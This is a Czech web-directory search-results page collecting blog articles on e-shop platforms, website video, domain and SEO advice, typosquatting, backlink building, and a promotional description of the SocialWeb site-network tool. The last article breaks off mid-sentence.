Výsledky vyhledávání v sekci E-shopy a šablony na dotaz server

Jaké tech. řešení pro eshop? Mám pár zkušeností

access_time10.červen 2019personZdenek Slavik

Občas se mně někdo ptá na čem postavit eshop. Bohužel odpověď je docela složitá, napíšu vám sem pár typů z vlastní zkušenosti. Spravuji pár eshopů – dalo by se to sice spočítat na jedné a půl ruce, pokud beru v úvahu i projekty na kterých se podílím, ale pracoval jsem již s více řešeními. Vyzkoušel jsem desítky řešení při hledání optimálního, ale po 10ti minutách v administraci určitě nemohu hodnotit.Pozor eshopy hodnotím ze subjektivního pohleduSimplia - pronájemJedná se o klasický pronájem, kterých jsou na trhu desítky méně dobrých, ale i špičkových. Simplii řadím do druhé kategorie. Mezi hlavní přednosti počítám ceny a možnost vymýšlet si úpravy na míru. Zatím jsem se nesetkal s vylepšením, které by nešlo vytvořit – tedy hlavně na frontendu. Zde totiž vidím problém většiny pronájmů kde je problém i vlastní jednoduchá šablona. Další výhodu je možnost zapojit eshop do jejich affiliate a systému na přeposílání objednávek. Mají to celkem zmáknuté, i když by se našlo spousty vylepšení, které by bylo vhodné udělat. Jedinou slabinu vidím v časovém vytížení této společnosti, kde je někdy opravdu problém něco vyřešit hodně rychle, ale i tak s tím nemám větší problémy.Dále se mi líbí že mám i přístup k šablonám, kde mohu udělat drobné úpravy, klient tedy ve výsledku zaplatí méně než kdybych to já komunikoval se simplií.Webmex – pronájem/vývojová licenceWebmex byl původně systém SuperQC, který je postaven na základech polském Quick Cartu. S tímto systémem je to trochu komplikovanější, nyní to vzal do ruky nový majitel Jirka Warmuž a snaží se systém posunout o velký kus dopředu. A i když má systém jenom pár měsíců pokroky jsou určitě znát. SuperQC byl původně založen na prodeji doživotních licencí za pár korun – myslím 2000 Kč, jak kdy.Nyní lze webmex pořídit ve dvouch variantách a to jako vývojářskou licenci (bez podpory, bez modulů, bez aktualizací) a formou pronájmu. Na tomto systému se mi líbí nejvíce vývojářská licence, kterou lze pořídit za pár korun a dělat s ní zázraky. Hlavní výhodu u ní je pořizovací cena, eshop stačí nainstalovat, nastavit DPH, nastavit šablonu a eshop běží. Veškerou funkčnost má již v sobě – porovnávače zboží, měření konverzí, importy od dodavatelů atd..Pronájem tedy doporučuji všem co chtějí kompletní eshop a nestarat se o technické záležitosti, cena je zatím oproti konkurenci velice příznívá. Pochválit musím i pružnost při navrhování nové funkčnosti. Vývojářskou licenci doporučuji někomu kdo se rád hrabe ve zdrojových kódech a nechce se vlastně starat tolik o provoz eshopu, nebo má na správu eshopu někoho najatého. Doporučuji všem co chtějí Prestashop.Sunlight – pronájemTento systém jsem provozoval asi jen dva měsíce, v podstatě sním tedy nemám zkušenosti. Oproti ostatním je ale určitě uživatelsky přívětivější. Na druhou stranu pokud s eshopem pracujete denně stejně víte kde co najít. Dále se mi líbily celkem propracované statistiky, běžný uživatel nepotřebuje chodit do GA.ShopSys – pronájem/koupě licenceTady nevím jak přesně začít, nerad někoho pomlouvám. Na tomto systému spravuji jeden eshop, bohužel se jednalo o koupi již fungujícího eshopu a nešlo proto vybírat technické řešení. Eshop který spravuji je na zakoupené licenci asi před třemi roky a nyní již mají novou verzi systému – bohužel na novou verzi nelze bezplatně a bez bolestně přejít. Eshop jsme dostali a obsahoval pár nefunkčních věcí, kde jsme museli s ShopSysem komunikovat a žádat o nápravu. Vše ale dopadlo dobře a nyní běží jak má. Další menší výtku bych měl k práci v administraci – je trochu nestandardní a pro mne méně přívětivá. Stává se mi běžně že musím hledat něco co jsem použil jen jednou.Tento systém tedy ani nedoporučuji ani od něj neodrazuji, pouze moje osobní zkušenosti nejsou zcela dobré. Jediné co mohu pochválit je výborná podpora, opravdu tam mají pár lidí co se stají o požadavky klientů.SocialWeb – zdarma eshopSocialWeb je víc než jen e-shop, je to spíše koncept prodeje a komunita prodejců, tedy alespoň z mého pohledu. Tento systém totiž jako jediný umožňuje vytvářet libovolný počet eshopů na libovolném počtu domén, což znamená, že si můžete velmi jednoduše sami sobě konkurovat a zahlcovat svým produktem trh.Také podporuje Dropshipping a Affiliate, takže vaše zboží z vašeho eshopu - pokud to jednoduše povolíte může nabízet k prodeji X dalších lidí ve svých SocialWeb eshopech a na svých SocialWeb webových stránkách.Nicméně i tohle řešení má jisté nevýhody, nejde upravovat zdrojový kód - ikdyž si ho můžete stáhnout a nainstalovat na svůj vlastní webhosting a nebo server. A celkem málo šablon. Prestashop – open sourcePrestashop jsem používal více než před dvěma lety, nevím tedy zda se něco výrazně změnilo. Ale v podstatě nemám tento systém moc v lásce a to hlavně proto že není primárně určen na český trh a je potřeba provést celkem dost úprav než lze na tomto řešení pustit eshop. Co mě dále strašně irituje že většina eshopů na prestashopu lze poznat na první pohled a obecně na takovém eshopu nerad nakupuji – nevím jak to máte vy, ale když vidím eshop na prestashopu, jdu raději pryč, pokud ho neznám.Doufám ale že za ty dva roky udělal krok kupředu a je již na jíné úrovni. Neodpustím si ale dodat – pokud chcete eshop kde si budete chtít hrát i s kódem, volte webmex s vývojářskou licenci, výjde vás ve výsledku i levněji. Pokud chcete kompletní přehled eshopů můžete si přečíst třeba tento článek.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Webové stránky na dotaz server

Přehrávání videa na stránkách

access_time29.říjen 2019personAdmin

Pokud potřebujete mít na své internetové stránce také přehrávání videa, pak nepřestávejte číst. Zajímavým doplňkem mnoha webových stránek se stalo právě video, které dokáže stránky obohatit a zpestřit. Musí být však vhodně zvolené. Například u jazykové školy zvolíme video ukazující činnost školy, ale také pneuservis si může umístit na web video v podobě své práce. Velkým trendem se stalo ale i vkládání videí u cestovních kanceláří, kde odkazují na zajímavé turistické destinace. Zákazníci tak mají lepší představivost o navštěvované zemi.Co zvolit pro přehrávání videa?Je ale potřeba zvolit vhodný program, díky němuž přehrajete video na internetových stránkách. První a snad nejrozšířenější možností se stává vložení videa prostřednictvím YouTube. Tato volba dominuje hned několika výhodami, ale také nevýhodami. Mezi přední výhody se řadí skutečnost, že vložení videa zvládne i laik. YouTube Vás neomezuje na formáty videa a statistiky návštěv jsou ve špičkové kvalitě. Díky YouTube nebudete zatěžovat svůj vlastní server, co se týče výkonu a objemu dat. Mezi nevýhody se řadí vkládaná cizí reklama ve stále větším měřítku. Pro mnohé je negativní i skutečnost, že nemůžete kontrolovat svá data, obsah může být totiž kdykoliv smazán, a to bez udání důvodů.Další možností, která se nabízí, je vlastní přehrávač videa. K použití je například FlowPlayer. Velkou výhodou je, že máte videa umístěná „u sebe“, laicky řečeno. Přehrávač si přizpůsobíte dle vlastních potřeb a můžete nastavit dokonce jeho speciální funkce, jako je zapnutí dalšího videa po skončení přehrávání. Video také můžete propojit s Google Analytics. Avšak zatěžujete svůj vlastní serveru, přičemž narazíte mnohdy i na datové omezení webhostingu. Video musíte konvertovat do požadovaného formátu a za funkčnost vlastního playeru často budete muset na svých webových stránkách zaplatit, protože se jedná o rozšíření.Co si tedy zvolit?Nyní však zůstává otázkou, pro kterou možnost se rozhodnout. Pokud tedy nepotřebujete nastavovat žádné speciální funkce, plně si vystačíte s videi na YouTube, ale musíte denně kontrolovat, zda nebyl obsah smazán. Návštěvníci Vašeho webu by byli zklamaní, že video nejde přehrát. Máte-li však rozsáhlý projekt, který si vyžaduje mnoho nastavení, pak si zvolte svůj vlastní přehrávač.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz server

Proč je dobré být anonymní

access_time13.květen 2019personRedakce

Pročítám si tak internet, narazím na Technet a v něm na článek s názvem “Podnikavec prodává doménu pro další povodně v roce 2011″. Nedokážu to říci s určitostí, mám ale dojem, že už sem ho viděl dříve. Tento článek již vyšel v roce 2010 v době povodní a informoval o tom, že si jistý “podnikavec” zaregistroval doménu povodne2011 .cz a tak předpokládal, že k další povodni určitě dojde i “příští rok”.A už to jelo. Majitele je třeba pranýřovat. Takže nám Technet, jak je u iDnesu zvykem, sdělil že si tuto doménu zaregistroval jistý Michal Řehoř. Ano, majitel domény se dá běžně zjistit ve whois databázích. To ale neznamená, že by se mělo jméno používat k pranýřování. Navíc iDnes zachází ještě dále. Informuje, že majitel má ve svém portfoliu i další projekty a že spolupracuje s warez fórem ( Technet pro méně informované projistotu vysvětlil že jde o fórum s nelegálními filmy, hudbou a programy ).Ano, byly využity veřejné informace. Z jakého důvodu byl ale tento člověk pranýřován? Celý článek je napsán “moralistickým” duchem. Tento zpravodajský server se snaží manipulovat s veřejným míněním a toto je další ukázka, jak to udělat. Všichni by měli nejspíše ukázat prstem a říci: “Řehoři, jsi nemorální hovado!”.Proč ale po tomto všem obhajovat veřejné registry, kde se tyto informace dají vyhledat? V současné době se spoustu zíjmových skupin snaží razit heslo, že “kdo nic nekalého nedělá, nemá se za co stydět”. Oranžády chtějí zavést akcie na majitele a lidé se diví majitelům zahraničních společností, kde se nedá dohledat majitel v obchodním rejstříku. Není se jim co divit, když se podíváme jak s těmito informacemi novináři pracují.

folder_openPřiřazené štítky

Doména a optimalizace pro vyhledávače

access_time21.březen 2020personRedakce

Podíváme se dnes na to jak doména ovlivňuje optimalizaci pro vyhledávače neboli SEO. Odpovíme na všechny otázky co týče toho, jaká doména je lepší pro SEO a jaká má větší schopnost prodávat.Stáři doményStáří domény je nejsilnější kritérium pro optimalizaci pro vyhledávače. Čím starší doména tím lepší, jelikož stará doména je znakem toho, že projekt umístěný na této www prezentaci působí dlouho. Při tvorbě webových stránek doporučujeme kupovat starší doménu stojí to sice více peněz, ale při této investici je určitě zřetelné, že projekt bude mít budoucnost a bude naplněn unikátním obsahem. I když vyhledávač nemůže zkontrolovat za jakou cenu byla doména pořízena může zkontrolovat přes WHO IS datum založení domény.Nedoporučujeme kupovat doménu, která je méně starší než jeden rok, jen v případě že si kupujete absolutně novou. Ještě jedna výhoda starých domén je ta, že na ně vedou odkazy, které jsou taktéž staré, i když nevždy relevantní.Klíčový výraz v doméněMůžete mít buď stoprocentní shodu s klíčovým slovem a doménou, to znamená výraz ubytování Chorvatsko a doménu ubytovanichorvatsko.cz.Obsažení klíčového slova v doméně je sice plus, ale neznamená to nějaký zázrak přiblížíte se k úspěchu o 25%. Při malé konkurenci v daném tématu Vám stačí jenom doména s vyhledávaným souslovím a pár odkazů k dosáhnutí výsledku při optimalizaci pro vyhledávače. V případě že chcete být v TOPu při velkém trhu a velké konkurenci, samotná doména s klíčovým výrazem Vám nepomůže dosáhnout maxima a potřebujete stejně provádět jiné metody pro SEO.Doména: stáři a klíčový výraz spoluV případě, že si pořídíte novou doménu s vyhledávaným výrazem, nemusí to znamenat vždy úspěch. Vyhledávače nemají rádi nové domény a koukají na ně opatrně, aby se předešlo spamu nebo černým metodám od SEO specialistů. Většinou domény s populárními klíčovými výrazy jsou už dávno obsazeny, proto při koupi nějaké domény získáváte vyhledávající doménu a také výhodu slušného stáří.Špatně vybrané doményDomény typu levne-ubytovani-chorvatsko-pro-rodiny.cz je špatný výběr pro Vaší internetovu stránku. I když v předchozím článku jsme psali, že klíčový slova jsou dobrá v doméně, ale vše musí mít své hranice. Doména musí být rychle zapamatovatelná a jednoduchá, aby jste věděli jak správně vybrat doménu doporučujeme také přečíst náš článek - Doména pro www stránku jak si správně vybrat, na kterém naleznete všechna hlavní kritéria.Domény .COM proti .ORG, .NETDomény s koncovkou .COM jsou v dnešní době nejpopulárnější domény pro mezinárodní internet. Domény .COM stojí více než jejich konkurence jako jsou .NET nebo .ORG. Pro uživatele ze všech státu jsou lepší pro zapamatování domény s .COM než ostatní. Pro vyhledávač mnoho nepřináší, ale vyhledávač je jen pomůcka pro lidi, takže myslete na klienty. Domény .INFO obcházejte stranou, tyto koncovky nevyvolávají od uživatelů chuť klikat na danou stránku, lidi těmto doménám moc nedůvěřují a často se nevyskytují.Domény regionální jako jsou .CZ nebo .SK jsou dobré pro zaměření na jeden stát nebo region. Jsou špatné pro optimalizaci na mezinárodní vyhledávače, ale jsou dobré na určitou oblast pro optimalizaci. Snadno řečeno ve vyhledávači Seznam.cz je větší pravděpodobnost, že se objeví koncovka .CZ než .COM, ale na Google.com je to naopak.Délka doményJak lidé tak i vyhledávače nemají rádi zbytečně dlouhé domény. Proto nedoporučujeme kupovat domény s příliš dlouhým názvem. V tomto případě existuje snadné heslo čím kratší tím lepší.Server a umístění doményV případě, že si koupíte doménu s koncovkou .CZ je dobrý si také koupit místo na serveru v České republice. Sice tato webová stránka bude mít špatný umístění třeba v Německu, ale na českým trhu získáte větší prioritu.V případě, že si nebudete vědět rady s koupí doménu můžete se obrátit na naší společnost a my Vám poradíme s výběrem doménu pro Vaší internetovou stránku.

folder_openPřiřazené štítky

SEO analýza webových stránek

access_time21.březen 2020personRedakce

Nyní se podíváme na SEO analýzu webových stránek, probereme, v čem spočívá a na co si dát pozor. Nejdříve si řeknem, co je vlastně SEO audit. SEO analýza je první pohled na internetovou stránku před zahájením optimalizace pro vyhledávač. Existuje více typů SEO analýzy a dnes se podíváme na technický audit internetové stránky.Technický audit pro SEOTechnický audit SEO, jak je zřejmé z názvu, slouží ke kontrole technických parametrů internetové stránky. Mnohdy lidé, kteří se chtějí zabývat optimalizací, provádějí různé techniky a metody s projektem. Tyto techniky jsou sice účinné, ale bez základu jsou k ničemu. Před hlavní optimalizací je potřeba si dát na to pozor.1. Kontrola doményJelikož vše začíná u domény, je potřeba si zkontrolovat nějaké informace týkající se názvu internetové stránky. Nejdůležitějším parametrem je stáří domény. Pokud začínáte provádět pro někoho SEO, je třeba se podívat,kdy byla doména zaregistrována a na jak dlouho. Proč je to tak důležité? Odpověď je jednoduchá. Tento parametr webové stránky totiž nemůže SEO specialista nijak ovlivnit. Na jak dlouho je registrovaná doména, jedůležitá teoretická informace, ale z praxe to má i velký vliv na optimalizaci pro vyhledávače. Vyhledávací robot uvažuje tak, že na čím delší dobu je provedena registrace stránky, tím lepší vývoj této internetové stránky je zajištěn.2. Kontrola hostinguJedná se o parametr, na který se nesmíte dívat jako na technickou věc sloužící pro umístění Vaší internetové prezentace. Hosting hodně ovlivňuje SEO. Hlavní a nejdůležitější je, aby server, na němž běží Vaše webovástránka, byl vždy přístupný. Kvůli nefunkčnosti můžete zbytečně ztrácet zákazníky a také spadnete v algoritmu vyhledávače, protože při návštěvě Vaší stránky vyhledávač indexuje chybovou hlášku 500. Druhý, neménědůležitý parametr hostingu je rychlost načítání prezentace. V dnešní době sice mají všichni vysokorychlostní internet, ale pro vyhledávač je to jeden z parametrů, který ovlivní úspěšnost Vaší stránky.3. Soubor robots.txtNezapomínejte na tento soubor, jelikož robots.txt slouží pro určení stránek, které nemají být indexovány, a to kvůli duplicitě či kvůli materiálům, které neslouží veřejnosti. Pokud nemáte stránky, jež by neměly býtindexovány, pak stačí vytvořit robots.txt a povolit přístup všem robotům.4. Validní HTML kódValidní HTML kód je to nejmenší, co můžete pro technickou stránku SEO udělat. Zkontrolujte každou Vaši stránku přes W3C validátor a opravte všechny hlavní chyby Vašeho kódu. Vyhledávače mají lepší vztah k webovým stránkám, které jsou profesionálně vytvořené, tedy bez zbytečných chyb.5. Kontrola indexu ve vyhledávačíchJestliže máte nový projekt, pak pro Vás tento krok není určený. Ale máte-li starší projekt, pak zde zjistíte, jestli je vyhledávač seznámen s touto internetovou stránkou. Zjistit to můžete snadno ve vyhledávači pomocípříkazu „site:„.6. Kontrola počtu a kvality odkazůV případě, že to není nový projekt, zkontrolujte odkazy, které vedou na danou stránku. Tato informace Vám spíš poradí, jak moc bude těžké tuto stránku optimalizovat či upozornit na odkazy, které vedou z link farm.7. Kontrola kvality textu na stránceNejdřív zkontrolujte, zda je text na stránkách unikátní. Pokud se nejedná o originální článek, tak s optimalizací ani nezačínejte. Je to zbytečné plýtvání časem a financemi. Texty na stránkách musí být naprosto unikátní,proto je dobré se obrátit na copywritery. Když máte unikátní texty, stačí je jen inteligentně optimalizovat a kvalitní kontent je hotov. Hodně textu na stránce je třeba v případě, že máte velkou konkurenci, minimální počet znaků na stránce je 2 000 znaků. Vyhledávače mají spíše raději velké texty než malé, ale vše má své meze.Toto byly nejdůležitější parametry pro SEO analýzu webové stránky.

folder_openPřiřazené štítky

Copywriting a cílené překlepy

access_time22.březen 2020personRedakce

Ještě nedávno existovali webové stránky typu lcg.com, 100her.cz, gogle.cz či gmal.com, jistě se i v dnešní době můžete setkat s podobnými stránkami a v tomto článku se zaměříme na to jak vydělávají.Stále existuje celá řada podobných stránek, na které v tomto článku nechceme uvádět odkazy, proto byli záměrně vybrány webové stránky, které již neexistují. Tyto weby vydělávají díky slavnějším a známějším vzorům. Uživatelé se často dopouští překlepů, a proto kvůli překlepu se ocitnou úplně jinde. Mnohdy se dostanou do spárů reklamních lákadel, ale v tom horším případě na pornografický server. Překlepy nejsou v internetovém prostředí raritou. Jelikož zadáváme většinu adres ve spěchu, často se dopouštíme překlepů. Některé studie dokonce uvádí, že deset až dvacet procent všech ručně psaných www adres je psáno špatně.Člověk není neomylný - TyposquatterChyby v adresách, jichž se dopouštíme, může být hned několik. Jednak se jedná o pravopisné chyby, jako například mobyl.cz či překlep wwwgoogle.com. Také můžeme přeměnit namísto jednotného čísla množné, jako například seznamy.cz. Jakmile zadáte chybnou adresu, nevíte, na jaký typ stránek se dostanete. Tato chvíle je pak vhodná pro typosquattery.Typosquatter je internetový podnikatel, který vydělává na chybách druhých. Vytipuje si nějakou adresu, na níž umístí svůj vlastní obsah. Adresy se ale nenáhodně podobají některému z nejnavštěvovanějších serverů. Typosquatter si tak zajistí dostatečný počet návštěvníků, aniž by musel spouštět reklamní kampaň.Co na to copywriteři?Pokud budu mluvit za sebe, pak si nedokážu představit, že bych měl psát texty s úmyslnými gramatickými chybami. Jednak by byl pro mě článek nehodnotný a byla by pro mě ostuda takový článek prodávat. Ano, teoreticky je to práce jako každá jiná, ale prakticky se každý copywriter snaží, aby napsal co nejlepší text.Jak se před typosquattery ochránit?Nejlepší je zaregistrovat si i domény s několika překlepy, abyste předešli tomu, že by si některý typosquatter zaregistroval Vaši adresu s překlepy. Zabráníte tak internetovým zlatokopům, ale také jim nedovolíte, aby na Vašem jméně nevydělával někdo jiný.

folder_openPřiřazené štítky

Jak získat zdarma cenné zpětné odkazy pro svůj e-shop?

access_time20.duben 2020personRedakce

Ať se vám to líbí nebo ne, zpětné odkazy stále hrají prim, a jak to tak vypadá, tak budou důležité i v budoucnu, protože všechny ostatní metriky v podstatě selhávají. Krásným příkladem byl ruský server Yandex.ru, který zrušil hodnocení webových stránek podle zpětných odkazů. Ani ne půl roku na to musel tuto metriku vrátit zpět, protože žádné jiné lepší hodnocení není. No a protože to nyní víte, tak potřebujete začít cíleně budovat zpětné odkazy.Někdo to má holt snazšíNespoléhejte se na to, že vám zákazníci budou dělat zpětné odkazy sami od sebe. Ani náhodou. Tedy pokud neprovozujete e-shop, kam chodí technicky orientovaní lidé, kteří píší vlastní blogy a HTML jim není cizí. V opačných případech pak máte smůlu a za odkazy si budete muset jít sami. Řečeno v jednoduchosti. Ony i ženy dnes píší nejrůznější blogy, kterými se dokonce často i velmi úspěšně živí, ale takových žen je opravdu minimum.Katalogy jako základStejně jako je tento web, tak stejně tak existují i další katalogy, do nichž své weby můžete často zdarma registrovat. Určitě zkuste firmy.cz, nebo velmi oblíbený toplist.cz.Blog není volba, je to povinnostE-shop bez blogu dnes téměř nemá smysl. Na blogu můžete zákazníky upozorňovat na různé produkty, recenze, ale třeba i na cizí informační zdroje. S trochou kreativity se vám určitě podaří napsat pěkný článek, který může získat zpětné odkazy.Spolupráce s blogeryBlogeři jsou velmi důležití, zejména tzv. influeři, což jsou komunitou uznávaní blogeři, kteří na svůj blog pravidelně přivádí tisíce čtenářů lačnících po nových informacích. Až nějaké seženete, kontaktujte je a nabídněte jim spolupráci. Články si buď můžete objednat placené, výměnou za nějaký váš produkt, nebo blogerovi můžete nabídnout exkluzivitu v podobě zapůjčování demo produktů apod. V případě spokojenosti doporučuji s blogerem zůstat v kontaktu. Rozhodně se to vyplatí, protože budete potřebovat více článků.Využívejte všechny sociální sítěToto prosím berte s rezervou. Není tím totiž myšleno to, že máte na všech sociálních sítích zprovoznit firemní stránky, ale že jsou sociální sítě dobré pro získávání zpětných odkazů. Ke svým profilům si v naprosté většině případů můžete dát odkaz na svůj web. Jako ideální se jeví zejména YouTube, na který můžete dávat video recenze s odkazy na váš e-shop.Buďte originálníZpěváci jsou krásným příkladem toho, jak moc je potřeba se odlišit. Vezměte si například takovou Miley Cyrus. Jako mladá byla taková ta hodná a slušná holka, kterou si každý musel zamilovat. Jenže to šlo, když byla malá, jakmile vyrostla, musela se z hodné holky stát zlobivou holkou. No a tak dnes dělá různé vylomeniny, které jí pomáhají zůstat v centru dění a na hlavních stranách bulvárních časopisů. Udělejte to podobně. A pamatujte, i negativní reklama, je také reklama. Jako příklad lze uvést majitele nejmenovaného e-shopu se zbraněmi, který přistěhovalce využil do své reklamy, v které nabízel řešení přistěhovalecké problematiky. Reklama publikovaná na Facebooku ještě ten den obletěla všechna média a dost množná se dostala i do zahraničí. Majitel sice následně dostal pokutu. Na druhou stranu si udělal negativní super reklamu a získal zdarma vysoce hodnotné zpětné odkazy.Placená, za to však dobrá rada – kupování domén v aukcíchO této možnosti moc obchodníků neví, ale je lepší si koupit dobrou doménu v aukci a dát za ní klidně i 10.000 Kč, protože si za tuto směšnou částku kupujete doménu s již třeba několika stovkami zpětných odkazů, nebo exkluzivním doménovým jménem. Vtip je v tom, že za vytvoření odkazového profilu, který nákupem „zdědíte“, ušetříte mnohem více peněz, možná desítky i stovky tisíc korun. No a navíc máte to hned, ne až za rok či dva. Problematika doménových aukcí přesahuje rámec tohoto článku. Zajímá-li vás tato problematika, obraťte se na někoho zkušeného.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SocialWeb na dotaz server

Co je SocialWeb? ..vytváření privátních webových sítí.

access_time20.květen 2019personRedakce

SocialWeb není úplně vhodný pro jednotlivce, jejichž zájem je vytvořit si portfólio a nebo jednoduchou webovou prezentaci a to hned z několika důvodů:1. Firemní a nebo osobní webová prezentace se dá lépe postavit například přes WordPress a nebo X online nástrojům (Webnode,Wix….)2. Takový jednotlivci systém SocialWeb zkrátka nevyužijí a pro jiné uživatele systému SocialWeb jejich aktivity jak si povíme níže mají nulovou hodnotu.Takže, SocialWeb zkrátka není určen pro obyčejné uživatele, kteří si chtějí pouze sestavit svou webovou prezentaci a nebo jednoduchý blog.Teď asi nastává otázka pro koho je tedy SocialWeb určen?Víte pro koho je SocialWeb určen?- Marketingové agentury, PR agentury, dokonce i webdesign firmy pro budování microsites.- Pro majitele internetových obchodů pro budování podpůrných tématických webů.- Pro jednotlivce s ambicí stavět a spravovat několik, třeba i desítky webových stránek. Některé ze základních funkcí systému SocialWeb pro tvorbu a správu webových stránek:Vytváření a správa libovolného počtu webových stránek v jednom uživatelském účtu.Správa webhostingů, instalace SSL certifikátů, správa serverů a IP adres zcela automaticky a zdarma.Registrace domén přímo a automaticky z okamžitým nastavením DNS přímo na vám přiřazený server a IP adresu, kdy do několika minut automaticky můžete na zaregistrované doméně stavět web bez žádné akce z vaší strany.Wedos Wapi podpora, kdy můžete SocialWeb využívat jen jako registrační nástroj - tedy, že SocialWeb domény budete registrovat přes váš Wedos účet na vaše fakturační údaje a vše bude fungovat automaticky.Zobrazení a vyhledávání volných domén, SocialWeb monitoruje veškeré expirované domény a následně u nich zjišťuje zda jsou volné, pokud ano, můžete si kteroukoliv volnou expirovanou doménu ihned zaregistrovat, stejně tak můžete ve fulltextu vyhledávat domény, které obsahují konkrétní klíčové slovo. (Nyní je v databázi asi 80 000 CZ volných domén.).Monitoring expirujících domén a roboti pro předregistraci domén, kteří se budou snažit zaregistrovat doménu dříve než spekulanti a nebo jiní roboti za cenu registrace domény (jako alternativa k Daukce.cz, kde pokud doménu chcete, tak jim vlastně o ní řeknete a pak máte možnost si ji vydražit… což mě osobně přišlo vždy jako celkem sprosté.Několik šablon webů, které pak můžete libovolně sestavovat.Tvorba mobilních aplikací.Správa sociálních sítí a účtů, publikace na sociální sítě, plánování publikace…Blog, kategorie, sekce, příspěvky..25 modulů, které lze pro kteroukoliv šablonu použít.Sharelock (zamknutí obsahu, vyžadované sdílení před odemknutím), Agelock (zamknutí obsahu pro návštěvníky mladší X let.Push notifikace, shromažďování uživatelů pro každý z vašich webů, následně rozposílání upozornění v případě vložení nového článku.Pro publikaci automatické generování klíčových slov z obsahu článku (pokud nejsou vyplněny manuálně)Slideshow publikace, Video publikace, YouTube publikace, Publikace na X sociálních sítí, plánování publikace….SEO monitoring a počítání nefunkčních odkazů, kdy systém sleduje všechny URL adresy, které skončili na stránce 404 a management těchto odkazů (přesměrování, BAN…)Automatické opravy nefunkčních odkazů s tím, že se systém snaží najít vhodný článek na základě tagů článků.Kompletní jazykové mutace, weby je možné stavět pro jakoukoliv zem.Tvorba mobilních aplikací…..Slideshow editor (tvorba slideshow pro konkrétní weby)Video editor (stříhání, nahrávání videa i z URL adres) kompilace videa….CSS editor – web staváte na základě nějaké šablony, kdy pak ještě máte možnost šablonu webu překódovat CSS editorem.0% branding, nikde na žádném vašem webu není ani zmínka (ani v řádné URL adrese) o SocialWebu.100% minifikace zdrojového kódu.Možnost stažení zdrojového kódu pro webhosting vašich webů na vašich (Apache,Nginx) serverech.Tvorba a správa emailvých adres pro jakékoliv vaše domény.Vizualizace návštěvnosti a sledování návštěvnostiNewsletter řešení.A další funkce a řešení… Dobře, takže asi chápete, že SocialWeb obsahuje celou řadu nástrojů a funkcí, které komukoliv umožní vytvářet weby, pak je spravovat a také do nich publikovat plus celou řadu nástrojů, které žádná jiná služba nenabízí.Řekněme, že máte firmu a chcete díky SocialWebu vytvořit několik webů, SocialWeb umožňuje kromě výše zmíněných věcí také sestavit si tým, v tomhle ukázkovém případě budou mým týmem tři lidé.Jeden z těchto lidí v týmu se jmenuje Tom a ten také jako jediný umí pracovat se systémem SocialWeb, takže vlastně jeho úkolem a cílem bude celou vaši privátní síť sestavit.- Zaregistruje domény- Vytvoří wwbhostingy- Vytvoří SSL certifikáty- Nastaví PUSH notifikace- Vytvoří weby- Vytvoří a vloží logo pro každý z nich- Vytvoří kategorie a sekce- Sestaví moduly pro každý web- Vytvoří Sociální stránky a účtyTakže Tom vlastně všechno nachystá, pokud vytvoří pouze dvě webové stránky s jednou, která bude přesměrovaná na sekci jiného webu, struktura toho co Tom může nachystat může vypadat třeba takhle:Takže možná již začínáte chápat, že SocialWeb nejsou pouze nástroje pro tvorbu a správu webových stránek, SocialWeb je hlavně koncept vytváření webových sítí.SocialWeb nekonkuruje těm co weby vytváří, online nástrojům pro tvorbu webů, kde máte možnost si vytvořit web a administraci, SocialWeb jsou struktury a vztahy mezi jednotlivými službami a to tak aby všechno bylo maximálně automatizované a jednoduché – tedy aby Tom nepotřeboval znalost programování, zkrátka aby to zvládl téměř každý, tohle je skutečně velmi jednoduchá síť, kterou lze systémem SocialWeb vytvořit, skutečné sítě pak jsou mnohem složitější, sestavené z desítek webů a stovek sociálních účtů a stránek. Teď v týmu máme Janu, ta vůbec neví co je SocialWeb, ani nechápe jak SocialWeb funguje a vlastně to ani nepotřebuje vědět, jejím jediným úkolem je přečíst si zadání a napsat článek, přiložit obrázek (video), zvolit z nabídky sociální sítě a stránky na kterých si přeje tento článek publikovat a vlastně jen kliknout na tlačítko publikovat, to co Jana takto udělá pak vypadá asi tak:Jana dostala úkol publikovat článek na web magazin21.cz na téma Krabičková dieta.Jana článek sepsala a u článku zvolila, že chce tento článek publikovat také na dvou Facebook stránkách, jedné Twitter stránce a do nějaké Pinterest nástěnce.Také u článku zatrhla rozeslat PUSH notifikaci a také rozeslat Email newsletter.Takže zatrhla a sepsala, nic víc dělat nemusela, výsledek?1. Článek byl publikován na web Magazin21.cz do kategorie Hubnutí a styl2. Bylo rozesláno upozornění (PUSH notifikace) všem odběratelům tohoto webu (1013 lidí)3. Byli upozorněni lidé, kteří mají nainstalovanou ios aplikaci webu Magazin21 (800 lidí)4. Byli upozorněni lidé, kteří mají nainstalovanou android aplikaci webu Magazin21 (3200 lidí)5. Bylo odesláno 540 emailů 540 odběratelům newsletteru o novém článku6. Článek byl publikován do Facebook stránky Jíme zdravě (1000 členů)7. Článek byl publikován do Facebook stránky Magazin21 (250 lajků)8. Článek byl publikován do Twitter stránky Magazin21 (250 odběratelů)9. Článek byl publikován na Pinterest, Instagram, LinkedIn… (X dalších sledujících/odběratelů) Takže jedním publikovaným článkem na jeden web Jana hned oslovila nejméně strovky lidí..Články, která vykazují vysokou počáteční návštěvnost, mají i mnohem vyšší průběžnou čtenost a jsou také rychleji zaindexovány ve vyhledávačích. Takže tohle je SocialWeb?Do teď jsem hovořil o vytváření privátních sítí, jenže tito majitelé firem se svými sítěmi jsou vlastně součástí další sítě, která přináší spoustu výhod, jen bych ještě rád upozornil na to, že využívání těchto komponentů SocialWebu je zdela dobrovolné.Podívejme se na 4 koncepty různých uživatelů SocialWebu:1. To je síť kterou jsem popsal výše, tři členové týmu, dva weby.2. Tohle je síť uživatele, jenž nemá členy týmu ale má 8 webových stránek.3. Uživatel, který nemá ani webové stránky ani členy týmu.4. Uživatel, jenž nemá žádné webové stránky ale má členy týmu. Výhoda – Tvorba obsahu a copywritingUživatel číslo jedna, je vlastně soběstačný, má svůj tým a své weby a vlastně vůbec tuto výhodu nepotřebuje.Uživatel dva má velké množství webů, do kterých by měl neustále dodávat nějaký obsah, jenže pochopitelně na to nemá čas ani kapacitu a přesně z toho důvodu může v SocialWebu existovat uživatel 3 a 4, kteří se vlastně živý copywritingem a dodávají obsah na webové stránky jiných uživatelů.Takže takhle se v SocialWebu může v cloudu tvořit obsah webových stránek.O tom jak funkce pro výkup článků v systému socialweb funguje jsem napsal zde článek.Obsah je velmi důležitý, stejně tak jako 